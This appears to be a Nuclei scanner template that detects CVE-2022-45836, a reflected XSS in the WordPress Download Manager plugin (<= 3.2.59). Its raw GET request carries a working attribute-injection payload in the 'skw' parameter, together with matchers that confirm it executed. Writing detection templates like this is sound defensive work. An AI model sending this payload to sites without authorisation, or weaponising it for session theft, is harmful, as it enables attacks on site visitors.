id: CVE-2022-45836

info:
  name: WordPress Download Manager <= 3.2.59 - Reflected XSS
  author: Shivam Kamboj
  severity: high
  description: |
    W3 Eden, Inc. Download Manager plugin <= 3.2.59 contains a reflected cross-site scripting caused by insufficient input sanitization, letting attackers execute scripts in the context of the victim's browser, exploit requires attacker to craft a malicious link.
  impact: |
    Attackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking or defacement.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-45836
    - https://patchstack.com/database/wordpress/plugin/download-manager/vulnerability/wordpress-download-manager-plugin-3-2-59-reflected-cross-site-scripting-xss-vulnerability
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/plugins/download-manager/"
  tags: cve,cve2022,wordpress,wp-plugin,xss,download-manager,wpdm,wp

http:
  - raw:
      - |
        GET /?skw=%22%20onfocus%3D%22alert%28document.domain%29%22%20autofocus%3D%22 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "onfocus=\"alert(document.domain)\" autofocus=\"\"","download-manager")'
        condition: and
# digest: 490a0046304402200e961cbee8f659b436f3492f91ce3d45078b6fb39f16a50a25e6661750f476e402201b61b88e683ec91d18efe40134510a034b3eab964c056e2434393e4f9a792b43:922c64590222798bb761d5b6d8e72950